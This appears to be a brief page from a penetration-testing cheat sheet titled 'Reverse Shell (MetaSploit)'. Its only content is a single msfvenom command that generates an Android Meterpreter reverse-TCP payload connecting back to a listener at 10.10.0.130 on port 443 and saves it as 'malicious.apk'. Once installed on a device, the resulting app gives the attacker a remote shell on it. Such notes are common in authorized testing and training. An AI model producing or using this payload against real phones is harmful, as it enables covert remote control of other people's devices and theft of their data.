Basic

Basic

Reverse Shell (MetaSploit)

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.0.130 LPORT=443 -o malicious.apk

Last updated